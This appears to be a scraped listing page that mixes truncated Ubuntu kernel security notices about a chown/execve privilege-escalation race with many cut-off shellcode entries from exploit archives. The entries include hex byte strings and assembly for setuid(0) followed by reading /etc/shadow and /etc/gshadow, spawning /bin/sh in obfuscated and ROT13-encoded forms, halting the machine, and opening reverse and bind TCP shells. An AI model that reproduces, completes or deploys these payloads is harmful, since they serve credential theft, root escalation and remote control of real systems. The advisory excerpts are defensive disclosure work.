USN-2598-1: Linux kernel vulnerability

A race condition between chown and execve was discovered in the Linux kernel. A local attacker could exploit this race by using chown on a setuid-user-binary to gain administrative privileges...

USN-2597-1: Linux kernel (Trusty HWE) vulnerability

A race condition between chown and execve was discovered in the Linux kernel. A local attacker could exploit this race by using chown on a setuid-user-binary to gain administrative privileges...

USN-2596-1: Linux kernel vulnerability

A race condition between chown and execve was discovered in the Linux kernel. A local attacker could exploit this race by using chown on a setuid-user-binary to gain administrative privileges...

[USN-2583-1] Linux kernel vulnerability

========================================================================== Ubuntu Security Notice USN-2583-1 April 30, 2015 linux vulnerability ========================================================================== A security issue affects these releases of Ubuntu and its derivatives: - Ubunt...

linux/x86 setuid(0) + setgid(0) + execve("/bin/cat", "/etc//shadow") - 52 by

// linux/x86 setuid0 + setgid0 + execve"/bin/cat", "/etc//shadow" - 52 bytes // Febriyanto Nugroho include char shellcode = "\x6a\x17\x58\xcd\x80\x6a\x2e" "\x58\xcd\x80\x6a\x0b\x58\x99" "\x52\x68\x61\x64\x6f\x77\x68" "\x2f\x2f\x73\x68\x68\x2f\x65" "\x74\x63\x89\xe1\x52\x68\x2f"...

Ubuntu: Security Advisory (USN-2583-1)

The remote host is missing an update for the SPDX-FileCopyrightText: 2015 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only ifdescription...

USN-2584-1: Linux kernel (EC2) vulnerability

A race condition between chown and execve was discovered in the Linux kernel. A local attacker could exploit this race by using chown on a setuid-user-binary to gain administrative privileges...

linux/x86 execve("/usr/bin/ssh", "127.0.0.1") - 50 bytes

// linux/x86 execve"/usr/bin/ssh", "/usr/bin/ssh", "127.0.0.1", NULL - 50 bytes // Febriyanto Nugroho include char shellcode = "\x6a\x0b" "\x58" "\x99" "\x52" "\x68\x2f\x73\x73\x68" "\x68\x2f\x62\x69\x6e" "\x68\x2f\x75\x73\x72" "\x89\xe3" "\x52" "\x6a\x31" "\x66\x68\x30\x2e" "\x66\x68\x30\x2e"...

Linux x86 - Execve /bin/sh Shellcode Via Push 21 bytes

Linux x86 - Execve /bin/sh Shellcode Via Push 21 bytes. Shellcode exploit for linx86 platform / Execve /bin/sh Shellcode Via Push Linux x86 21 bytes Dying to be the shortest. Copyright C 2015 Gu Zhengxiong [email protected] 18 February 2015 GPL .global start start: char const argv xorl %ecx, %ecx...

Linux x86-64 - Execve /bin/sh Shellcode Via Push 23 bytes

Linux x86-64 - Execve /bin/sh Shellcode Via Push 23 bytes. Shellcode exploit for linx86-64 platform / Execve /bin/sh Shellcode Via Push Linux x8664 23 bytes Dying to be the shortest. Copyright C 2015 Gu Zhengxiong [email protected] 27 April 2015 GPL .global start start: char const argv xorl %esi,...

linux/x86 to see /proc/sys/kernel/randomize_va_space - 79 bytes

/ Exploit Title : linux/x86 execve"/bin/cat", "/bin/cat", "/proc/sys/kernel/randomizevaspace", NULL - 79 bytes Exploit Author : Febriyanto Nugroho Tested on : Linux Debian 5.0.5 / include char shellcode = "\x31\xdb" "\x6a\x17" "\x58" "\xcd\x80" "\x8d\x43\x0b" "\x99" "\x52" "\x68\x2f\x63\x61\x74"...

linux/x86 execve("/bin/cat", "/etc/gshadow") - 44 bytes

/ Exploit Title : linux/x86 execve"/bin/cat", "/bin/cat", "/etc/gshadow", NULL - 44 bytes Exploit Author : Febriyanto Nugroho Tested on : Linux Debian 5.0.5 / include char shellcode = "\x31\xdb" "\x8d\x43\x0b" "\x99" "\x52" "\x68\x2f\x63\x61\x74" "\x68\x2f\x62\x69\x6e" "\x89\xe3" "\x52"...

linux/x86 setuid(0, 0) + execve("/usr/sbin/hibernate") + exit(0) - 59 bytes

/ +========================================================================================================= | Exploit Title : linux/x86 setuid0, 0 + execve"/usr/sbin/hibernate" + exit0 - 59 bytes | Exploit Author : Febriyanto Nugroho | Tested on : Linux Debian 5.0.5 |...

linux/x86 setreuid(0, 0) + execve("/sbin/halt") + exit(0) - 49 bytes

/ +======================================================================================== | Exploit Title : linux/x86 setreuid0, 0 + execve"/sbin/halt" + exit0 - 49 bytes | Exploit Author : Febriyanto Nugroho | Tested on : Linux Debian 5.0.5...

linux/x86 setreuid0, 0 + execve"/sbin/halt" + exit0 49 bytes

linux/x86 setreuid0, 0 + execve"/sbin/halt" + exit0 49 bytes. Shellcode exploit for linx86-64 platform / +======================================================================================== | Exploit Title : linux/x86 setreuid0, 0 + execve"/sbin/halt" + exit0 - 49 bytes | Exploit Author :...

Linux MIPS execve-vulnerability warning-the black bar safety net

include stdio. h / Sanguine@debian-mipsel:/leaveret cat MIPS36bsc. s . section . text . globl start . set noreorder start: slti $a2, $zero, -1 set a1 to zero p: bltzal $a2, p not branch always and save ra slti $a1, $zero, -1 set a1 to zero addu $a0, $ra, 4 0 9 7 a0 + 1 6 addu $a0, $a0, -4081 li...

linux/x86 - Obfuscated execve"/bin/sh" 40 bytes

linux/x86 - Obfuscated execve"/bin/sh" 40 bytes. Shellcode exploit for linx86 platform / Linux x86 - execve"/bin/sh" shellcode Obfuscated version - 40 bytes Original: http://shell-storm.org/shellcode/files/shellcode-811.php Author: xmgv Details:...

Linux/x86 - Reverse TCP Shell 72 bytes

Linux/x86 - Reverse TCP Shell 72 bytes. Shellcode exploit for linx86 platform / Linux x86 - Reverse TCP Shell - 72 bytes Author: xmgv Details: https://xmgv.wordpress.com/2015/02/21/slae-assignment-2-reverse-shell/ / / global start section .text start: ; socketAFINET, SOCKSTREAM, 0; push 0x66 ;...

linux/x86 - ROT13 encoded execve"/bin/sh" 68 bytes

linux/x86 - ROT13 encoded execve"/bin/sh" 68 bytes. Shellcode exploit for linx86 platform / Linux x86 - ROT13 encoded execve"/bin/sh" - 68 bytes Author: xmgv Details: https://xmgv.wordpress.com/2015/03/04/slae-4-custom-shellcode-encoder/ / / global start section .text start: jmp short calldecoder...

Linux/x86 - TCP Bind Shell 96 bytes

Linux/x86 - TCP Bind Shell 96 bytes. Shellcode exploit for linx86 platform / Linux x86 - TCP Bind Shell - 96 bytes Author: xmgv Details: https://xmgv.wordpress.com/2015/02/19/28/ / / global start section .text start: xor ebx, ebx ; zero out ebx mul ebx ; zero out eax, edx ; socketAFINET,...